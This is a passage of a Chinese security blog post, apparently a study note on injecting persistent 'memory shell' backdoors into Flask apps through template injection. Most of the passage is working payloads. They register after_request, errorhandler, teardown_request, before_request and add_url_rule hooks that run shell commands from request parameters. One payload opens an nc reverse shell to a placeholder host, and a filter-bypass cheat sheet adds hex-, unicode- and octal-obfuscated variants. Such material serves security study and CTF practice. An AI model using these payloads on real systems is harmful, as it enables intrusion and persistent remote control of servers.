class="string">            \&quot;\&quot;\&quot;</span></span><br><span class="line"><span class="string">            global CmdResp;</span></span><br><span class="line"><span class="string">            CmdResp = __import__(&#x27;flask&#x27;).make_response(</span></span><br><span class="line"><span class="string">                __import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read()</span></span><br><span class="line"><span class="string">            )</span></span><br><span class="line"><span class="string">            \&quot;\&quot;\&quot;</span></span><br><span class="line"><span class="string">        ) == None else resp</span></span><br><span class="line"><span class="string">    )</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span>,</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="string">&#x27;request&#x27;</span>: url_for.__globals__[<span class="string">&#x27;request&#x27;</span>],</span><br><span class="line">        <span class="string">&#x27;app&#x27;</span>: url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]</span><br><span class="line">    &#125;</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>仔细的理解一下中间的lambda表达式</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">lambda</span> resp: <span class="comment">#传入resp参数</span></span><br><span class="line">    CmdResp <span class="keyword">if</span> request.args.get(<span class="string">&#x27;cmd&#x27;</span>) <span class="keyword">and</span>      <span class="comment">#如果请求参数含有cmd则返回命令执行结果</span></span><br><span class="line">    <span class="built_in">exec</span>(<span class="string">&#x27;</span></span><br><span class="line"><span class="string">        global CmdResp;     #定义一个全局变量，方便获取</span></span><br><span class="line"><span class="string">        CmdResp=make_response(os.popen(request.args.get(\&#x27;cmd\&#x27;)).read())   #创建一个响应对象</span></span><br><span class="line"><span class="string">    &#x27;</span>)==<span class="literal">None</span>    <span class="comment">#exec函数返回None，所以恒真</span></span><br><span class="line">    <span class="keyword">else</span> resp)  <span class="comment">#如果请求参数没有cmd则正常返回</span></span><br><span class="line"><span class="comment">#这里的cmd参数名和CmdResp变量名都是可以改的，最好改成服务中不存在的变量名以免影响正常业务</span></span><br></pre></td></tr></table></figure>

<p><strong>三元表达式</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A <span class="keyword">if</span> condition <span class="keyword">else</span> B</span><br></pre></td></tr></table></figure>

<p>即:若condition为真，返回A，否则B</p>
<p>接下来要清楚，exec返回的结果都是None，所以and后面是恒真的(之前出题的时候也有遇到过，索性记下来了)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CmdResp=make_response(os.popen(request.args.get(\<span class="string">&#x27;cmd\&#x27;)).read())</span></span><br></pre></td></tr></table></figure>
<p>这其中为什么字符串中要有\呢，因为我们写的payload是一个字符串形式的python代码，那么转义就很有必要了，这里就是起到转义的作用</p>
<p>这最后再else resp是因为after_request是要定义一个返回值的，否则回报错，所以我们这里万一没传参也要返回一个response</p>
<h3 id="errorhandler方法"><a href="#errorhandler方法" class="headerlink" title="errorhandler方法"></a>errorhandler方法</h3><p>这个可以用于自定义404页面的回显，flask404的时候，我们用errorhandler定义的自定义的错误处理函数就会处理错误，并且返回适当的响应</p>
<p>看看源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@setupmethod</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">errorhandler</span>(<span class="params"></span></span><br><span class="line"><span class="params">        self, code_or_exception: t.<span class="type">Union</span>[t.<span class="type">Type</span>[Exception], <span class="built_in">int</span>]</span></span><br><span class="line"><span class="params">    </span>) -&gt; t.<span class="type">Callable</span>[[<span class="string">&quot;ErrorHandlerCallable&quot;</span>], <span class="string">&quot;ErrorHandlerCallable&quot;</span>]:</span><br><span class="line">        <span class="string">&quot;&quot;&quot;注册一个函数以处理按代码或异常类的错误。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        一个装饰器，用于注册给定错误代码的函数。例如：</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">            @app.errorhandler(404)</span></span><br><span class="line"><span class="string">            def page_not_found(error):</span></span><br><span class="line"><span class="string">                return &#x27;此页面不存在&#x27;, 404</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        你也可以注册任意异常的处理程序：</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">            @app.errorhandler(DatabaseError)</span></span><br><span class="line"><span class="string">            def special_exception_handler(error):</span></span><br><span class="line"><span class="string">                return &#x27;数据库连接失败&#x27;, 500</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span></span><br><span class="line">        <span class="keyword">def</span> <span class="title function_">decorator</span>(<span class="params">f: <span class="string">&quot;ErrorHandlerCallable&quot;</span></span>) -&gt; <span class="string">&quot;ErrorHandlerCallable&quot;</span>:</span><br><span class="line">            <span class="variable language_">self</span>.register_error_handler(code_or_exception, f)</span><br><span class="line">            <span class="keyword">return</span> f</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> decorator</span><br></pre></td></tr></table></figure>

<p>f就是我们定义的处理函数，但是我们还是得去跟进看一下register_error_handler</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">register_error_handler</span>(<span class="params"></span></span><br><span class="line"><span class="params">    self,</span></span><br><span class="line"><span class="params">    code_or_exception: t.<span class="type">Union</span>[t.<span class="type">Type</span>[Exception], <span class="built_in">int</span>],</span></span><br><span class="line"><span class="params">    f: <span class="string">&quot;ErrorHandlerCallable&quot;</span>,</span></span><br><span class="line"><span class="params"></span>) -&gt; <span class="literal">None</span>:</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">isinstance</span>(code_or_exception, HTTPException):  <span class="comment"># old broken behavior</span></span><br><span class="line">        <span class="keyword">raise</span> ValueError(</span><br><span class="line">            <span class="string">&quot;Tried to register a handler for an exception instance&quot;</span></span><br><span class="line">            <span class="string">f&quot; <span class="subst">&#123;code_or_exception!r&#125;</span>. Handlers can only be&quot;</span></span><br><span class="line">            <span class="string">&quot; registered for exception classes or HTTP error codes.&quot;</span></span><br><span class="line">        )</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        exc_class, code = <span class="variable language_">self</span>._get_exc_class_and_code(code_or_exception)</span><br><span class="line">    <span class="keyword">except</span> KeyError:</span><br><span class="line">        <span class="keyword">raise</span> KeyError(</span><br><span class="line">            <span class="string">f&quot;&#x27;<span class="subst">&#123;code_or_exception&#125;</span>&#x27; is not a recognized HTTP error&quot;</span></span><br><span class="line">            <span class="string">&quot; code. Use a subclass of HTTPException with that code&quot;</span></span><br><span class="line">            <span class="string">&quot; instead.&quot;</span></span><br><span class="line">        ) <span class="keyword">from</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">    <span class="variable language_">self</span>.error_handler_spec[<span class="literal">None</span>][code][exc_class] = f</span><br></pre></td></tr></table></figure>

<p>这里就是直接把结果赋值给f回显到错误的页面</p>
<p>payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__.__builtins__.<span class="built_in">exec</span>(<span class="string">&quot;global exc_class; global code; exc_class, code = app._get_exc_class_and_code(404); app.error_handler_spec[None][code][exc_class] = lambda a: __import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read()&quot;</span>,&#123;<span class="string">&#x27;request&#x27;</span>: url_for.__globals__[<span class="string">&#x27;request&#x27;</span>],<span class="string">&#x27;app&#x27;</span>: url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="teardown-appcontext"><a href="#teardown-appcontext" class="headerlink" title="teardown_appcontext"></a>teardown_appcontext</h3><h3 id="teardown-request"><a href="#teardown-request" class="headerlink" title="teardown_request"></a>teardown_request</h3><p>在每个请求之后要运行的函数，每一次的请求都会执行一次</p>
<p>在每个请求的最后阶段执行的，即在视图函数处理完成并生成响应后，或者在请求中发生未处理的异常时，都会执行这个 hook，他执行的事迹是在响应已经确认之后，但是最终发送给客户端之前</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">teardown_request</span>(<span class="params">self, f: T_teardown</span>) -&gt; T_teardown:</span><br><span class="line">        <span class="string">&quot;&quot;&quot;Register a function to be called when the request context is</span></span><br><span class="line"><span class="string">        popped. Typically this happens at the end of each request, but</span></span><br><span class="line"><span class="string">        contexts may be pushed manually as well during testing.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        .. code-block:: python</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">            with app.test_request_context():</span></span><br><span class="line"><span class="string">                ...</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        When the ``with`` block exits (or ``ctx.pop()`` is called), the</span></span><br><span class="line"><span class="string">        teardown functions are called just before the request context is</span></span><br><span class="line"><span class="string">        made inactive.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        When a teardown function was called because of an unhandled</span></span><br><span class="line"><span class="string">        exception it will be passed an error object. If an</span></span><br><span class="line"><span class="string">        :meth:`errorhandler` is registered, it will handle the exception</span></span><br><span class="line"><span class="string">        and the teardown will not receive it.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        Teardown functions must avoid raising exceptions. If they</span></span><br><span class="line"><span class="string">        execute code that might fail they must surround that code with a</span></span><br><span class="line"><span class="string">        ``try``/``except`` block and log any errors.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        The return values of teardown functions are ignored.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        This is available on both app and blueprint objects. When used on an app, this</span></span><br><span class="line"><span class="string">        executes after every request. When used on a blueprint, this executes after</span></span><br><span class="line"><span class="string">        every request that the blueprint handles. To register with a blueprint and</span></span><br><span class="line"><span class="string">        execute after every request, use :meth:`.Blueprint.teardown_app_request`.</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span></span><br><span class="line">        <span class="variable language_">self</span>.teardown_request_funcs.setdefault(<span class="literal">None</span>, []).append(f)</span><br><span class="line">        <span class="keyword">return</span> f</span><br></pre></td></tr></table></figure>

<p>怎么又长这样?</p>
<p>要注意的是这个函数是没有回显的，所以我们可以利用反弹shell或者说写入文件</p>
<p>弹shell payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__.__builtins__[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].teardown_request_funcs.setdefault(None, []).append(lambda error: __import__(&#x27;os&#x27;).system(&#x27;mkfifo /tmp/fifo; /bin/sh -i &lt; /tmp/fifo | nc xxxxxxxxxxx xxxx &gt; /tmp/fifo; rm /tmp/fifo&#x27;))&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>写文件payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].teardown_request_funcs.setdefault(None, []).append(lambda error: __import__(&#x27;os&#x27;).popen(&#x27;ls &gt; 1.txt&#x27;).read())&quot;</span>)</span><br></pre></td></tr></table></figure>

<h3 id="teardown-appcontext-1"><a href="#teardown-appcontext-1" class="headerlink" title="teardown_appcontext"></a>teardown_appcontext</h3><p>其实和teardown_request差不多，但是不能动态接受get参数<br>同样需要弹shell和写文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__.__builtins__[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].teardown_appcontext_funcs.append(lambda error: __import__(&#x27;os&#x27;).popen(&#x27;echo 2222 &gt; 1.txt&#x27;).read())&quot;</span>)&#125;&#125;</span><br></pre></td></tr></table></figure>


<p>一些bypass<br>摘自ChaMD5安全团队和the0n3师傅的博客</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">ByPass</span><br><span class="line">在实际应用中往往都存在过滤, 因此了解如何绕过还是必要的.</span><br><span class="line"></span><br><span class="line">url_for可替换为get_flashed_messages或者request.__init__或者request.application.</span><br><span class="line">代码执行函数替换, 如<span class="built_in">exec</span>等替换<span class="built_in">eval</span>.</span><br><span class="line">字符串可采用拼接方式, 如[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>]变为[<span class="string">&#x27;__bui&#x27;</span>+<span class="string">&#x27;ltins__&#x27;</span>][<span class="string">&#x27;ev&#x27;</span>+<span class="string">&#x27;al&#x27;</span>].</span><br><span class="line">__globals__可用__getattribute__(<span class="string">&#x27;__globa&#x27;</span>+<span class="string">&#x27;ls__&#x27;</span>)替换.</span><br><span class="line">[]可用.__getitem__()或.pop()替换.</span><br><span class="line">过滤&#123;&#123;或者&#125;&#125;, 可以使用&#123;%或者%&#125;绕过, &#123;%%&#125;中间可以执行<span class="keyword">if</span>语句, 利用这一点可以进行类似盲注的操作或者外带代码执行结果.</span><br><span class="line">过滤_可以用编码绕过, 如__class__替换成\x5f\x5fclass\x5f\x5f, 还可以用<span class="built_in">dir</span>(0)[0][0]或者request[<span class="string">&#x27;args&#x27;</span>]或者request[<span class="string">&#x27;values&#x27;</span>]绕过.</span><br><span class="line">过滤了.可以采用attr()或[]绕过.</span><br><span class="line">其它的手法参考SSTI绕过过滤的方法即可…</span><br></pre></td></tr></table></figure>
<p>原Payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;app.add_url_rule(&#x27;/h3rmesk1t&#x27;, &#x27;h3rmesk1t&#x27;, lambda :__import__(&#x27;os&#x27;).popen(_request_ctx_stack.top.request.args.get(&#x27;shell&#x27;)).read())&quot;</span>,&#123;<span class="string">&#x27;_request_ctx_stack&#x27;</span>:url_for.__globals__[<span class="string">&#x27;_request_ctx_stack&#x27;</span>],<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)</span><br></pre></td></tr></table></figure>
<p>变形Payload-1</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">request.application.__self__._get_data_for_json.__getattribute__(<span class="string">&#x27;__globa&#x27;</span>+<span class="string">&#x27;ls__&#x27;</span>).__getitem__(<span class="string">&#x27;__bui&#x27;</span>+<span class="string">&#x27;ltins__&#x27;</span>).__getitem__(<span class="string">&#x27;ex&#x27;</span>+<span class="string">&#x27;ec&#x27;</span>)(<span class="string">&quot;app.add_url_rule(&#x27;/h3rmesk1t&#x27;, &#x27;h3rmesk1t&#x27;, lambda :__import__(&#x27;os&#x27;).popen(_request_ctx_stack.top.request.args.get(&#x27;shell&#x27;, &#x27;calc&#x27;)).read())&quot;</span>,&#123;<span class="string">&#x27;_request_ct&#x27;</span>+<span class="string">&#x27;x_stack&#x27;</span>:get_flashed_messages.__getattribute__(<span class="string">&#x27;__globa&#x27;</span>+<span class="string">&#x27;ls__&#x27;</span>).pop(<span class="string">&#x27;_request_&#x27;</span>+<span class="string">&#x27;ctx_stack&#x27;</span>),<span class="string">&#x27;app&#x27;</span>:get_flashed_messages.__getattribute__(<span class="string">&#x27;__globa&#x27;</span>+<span class="string">&#x27;ls__&#x27;</span>).pop(<span class="string">&#x27;curre&#x27;</span>+<span class="string">&#x27;nt_app&#x27;</span>)&#125;)</span><br></pre></td></tr></table></figure>
<p>变形Payload-2</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">get_flashed_messages|attr(<span class="string">&quot;\x5f\x5fgetattribute\x5f\x5f&quot;</span>)(<span class="string">&quot;\x5f\x5fglobals\x5f\x5f&quot;</span>)|attr(<span class="string">&quot;\x5f\x5fgetattribute\x5f\x5f&quot;</span>)(<span class="string">&quot;\x5f\x5fgetitem\x5f\x5f&quot;</span>)(<span class="string">&quot;__builtins__&quot;</span>)|attr(<span class="string">&quot;\x5f\x5fgetattribute\x5f\x5f&quot;</span>)(<span class="string">&quot;\x5f\x5fgetitem\x5f\x5f&quot;</span>)(<span class="string">&quot;\u0065\u0076\u0061\u006c&quot;</span>)(<span class="string">&quot;app.add_ur&quot;</span>+<span class="string">&quot;l_rule(&#x27;/h3rmesk1t&#x27;, &#x27;h3rmesk1t&#x27;, la&quot;</span>+<span class="string">&quot;mbda :__imp&quot;</span>+<span class="string">&quot;ort__(&#x27;o&quot;</span>+<span class="string">&quot;s&#x27;).po&quot;</span>+<span class="string">&quot;pen(_request_c&quot;</span>+<span class="string">&quot;tx_stack.to&quot;</span>+<span class="string">&quot;p.re&quot;</span>+<span class="string">&quot;quest.args.get(&#x27;shell&#x27;)).re&quot;</span>+<span class="string">&quot;ad())&quot;</span>,&#123;<span class="string">&#x27;\u005f\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u005f\u0063\u0074\u0078\u005f\u0073\u0074\u0061\u0063\u006b&#x27;</span>:get_flashed_messages|attr(<span class="string">&quot;\x5f\x5fgetattribute\x5f\x5f&quot;</span>)(<span class="string">&quot;\x5f\x5fglobals\x5f\x5f&quot;</span>)|attr(<span class="string">&quot;\x5f\x5fgetattribute\x5f\x5f&quot;</span>)(<span class="string">&quot;\x5f\x5fgetitem\x5f\x5f&quot;</span>)(<span class="string">&quot;\u005f\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u005f\u0063\u0074\u0078\u005f\u0073\u0074\u0061\u0063\u006b&quot;</span>),<span class="string">&#x27;app&#x27;</span>:get_flashed_messages|attr(<span class="string">&quot;\x5f\x5fgetattribute\x5f\x5f&quot;</span>)(<span class="string">&quot;\x5f\x5fglobals\x5f\x5f&quot;</span>)|attr(<span class="string">&quot;\x5f\x5fgetattribute\x5f\x5f&quot;</span>)(<span class="string">&quot;\x5f\x5fgetitem\x5f\x5f&quot;</span>)(<span class="string">&quot;\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u005f\u0061\u0070\u0070&quot;</span>)&#125;)</span><br></pre></td></tr></table></figure>

<p>使用os.wrap的内置函数exec打入内存马</p>
<p>原始payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>[<span class="string">&#x27;__class__&#x27;</span>][<span class="string">&#x27;__base__&#x27;</span>][<span class="string">&#x27;__subclasses__&#x27;</span>]()[<span class="number">137</span>][<span class="string">&#x27;__init__&#x27;</span>][<span class="string">&#x27;__globals__&#x27;</span>][<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].before_request_funcs.setdefault(None, []).append(lambda: __import__(&#x27;os&#x27;).popen(__import__(&#x27;flask&#x27;).request.args.get(&#x27;a&#x27;)).read())&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>八进制payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>[<span class="string">&#x27;\137\137\143\154\141\163\163\137\137&#x27;</span>][<span class="string">&#x27;\137\137\142\141\163\145\137\137&#x27;</span>][<span class="string">&#x27;\137\137\163\165\142\143\154\141\163\163\145\163\137\137&#x27;</span>]()[<span class="number">137</span>][<span class="string">&#x27;\137\137\151\156\151\164\137\137&#x27;</span>][<span class="string">&#x27;\137\137\147\154\157\142\141\154\163\137\137&#x27;</span>][<span class="string">&#x27;\137\137\142\165\151\154\164\151\156\163\137\137&#x27;</span>][<span class="string">&#x27;\145\170\145\143&#x27;</span>](<span class="string">&quot;\163\171\163.\155\157\144\165\154\145\163[&#x27;\137\137\155\141\151\156\137\137&#x27;].\137\137\144\151\143\164\137\137[&#x27;\141\160\160&#x27;].\142\145\146\157\162\145\137\162\145\161\165\145\163\164\137\146\165\156\143\163.\163\145\164\144\145\146\141\165\154\164(\116\157\156\145, []).\141\160\160\145\156\144(\154\141\155\142\144\141: \137\137\151\155\160\157\162\164\137\137(&#x27;\157\163&#x27;).\160\157\160\145\156(\137\137\151\155\160\157\162\164\137\137(&#x27;\146\154\141\163\153&#x27;).\162\145\161\165\145\163\164.\141\162\147\163.\147\145\164(&#x27;\141&#x27;)).\162\145\141\144())&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>详细情况请看博客<br><a target="_blank" rel="noopener" href="https://the0n3.top/pages/77dbc1/#%E6%97%A0%E5%AD%97%E6%AF%8D%E6%89%93%E5%85%A5%E5%86%85%E5%AD%98%E9%A9%AC">https://the0n3.top/pages/77dbc1/#%E6%97%A0%E5%AD%97%E6%AF%8D%E6%89%93%E5%85%A5%E5%86%85%E5%AD%98%E9%A9%AC</a></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这篇我也鸽了10多天才补上，最近有点贪玩了(不好)</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E4%B8%93%E9%A2%98%E5%BC%BA%E5%8C%96%E7%BB%83/" rel="tag"># 专题强化练</a>
              <a href="/tags/%E5%86%85%E5%AD%98%E9%A9%AC/" rel="tag"># 内存马</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/08/15/Done-Nodejs%E8%BF%9B%E9%98%B6%E7%9F%A5%E8%AF%86%E7%82%B9/" rel="prev" title="Nodejs进阶知识点">
      <i class="fa fa-chevron-left"></i> Nodejs进阶知识点
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/08/18/%E4%BB%8EFenjing%E5%BC%80%E5%8F%91%E7%9A%84%E6%95%85%E4%BA%8B%E4%B8%AD%E6%88%91%E5%AD%A6%E5%88%B0%E4%BA%86%E4%BB%80%E4%B9%88/" rel="next" title="从Fengjin开发的故事中我学到了什么">
      从Fengjin开发的故事中我学到了什么 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%AC%E6%9C%9F%E6%8E%A8%E8%8D%90"><span class="nav-number">1.</span> <span class="nav-text">本期推荐</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">2.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%86%85%E5%AD%98%E9%A9%AC%E4%B8%8Eflask"><span class="nav-number">3.</span> <span class="nav-text">内存马与flask</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">4.</span> <span class="nav-text">前置知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#flask%E7%9A%84%E8%AF%B7%E6%B1%82%E4%B8%8A%E4%B8%8B%E6%96%87%E7%AE%A1%E7%90%86%E6%9C%BA%E5%88%B6"><span class="nav-number">4.1.</span> <span class="nav-text">flask的请求上下文管理机制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%92%A9%E5%AD%90%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="nav-number">4.2.</span> <span class="nav-text">钩子的区别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#POC%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">4.3.</span> <span class="nav-text">POC环境搭建</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%80%81%E7%89%88%E5%86%85%E5%AD%98%E9%A9%AC"><span class="nav-number">5.</span> <span class="nav-text">老版内存马</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%A7%8Dpayload"><span class="nav-number">5.1.</span> <span class="nav-text">第一种payload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E7%A7%8Dpayload"><span class="nav-number">5.2.</span> <span class="nav-text">第二种payload</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B0%E7%89%88%E5%86%85%E5%AD%98%E9%A9%AC"><span class="nav-number">6.</span> <span class="nav-text">新版内存马</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B3%E4%BA%8E%E7%89%B9%E6%AE%8A%E8%A3%85%E9%A5%B0%E5%99%A8-%E9%92%A9%E5%AD%90%E5%87%BD%E6%95%B0"><span class="nav-number">6.1.</span> <span class="nav-text">关于特殊装饰器(钩子函数)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#before-request%E6%96%B9%E6%B3%95"><span class="nav-number">6.2.</span> <span class="nav-text">before_request方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#after-request%E6%96%B9%E6%B3%95"><span class="nav-number">6.3.</span> <span class="nav-text">after_request方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#errorhandler%E6%96%B9%E6%B3%95"><span class="nav-number">6.4.</span> <span class="nav-text">errorhandler方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#teardown-appcontext"><span class="nav-number">6.5.</span> <span class="nav-text">teardown_appcontext</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#teardown-request"><span class="nav-number">6.6.</span> <span class="nav-text">teardown_request</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#teardown-appcontext-1"><span class="nav-number">6.7.</span> <span class="nav-text">teardown_appcontext</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">7.</span> <span class="nav-text">总结</span></a></li></ol></div>
      </div>
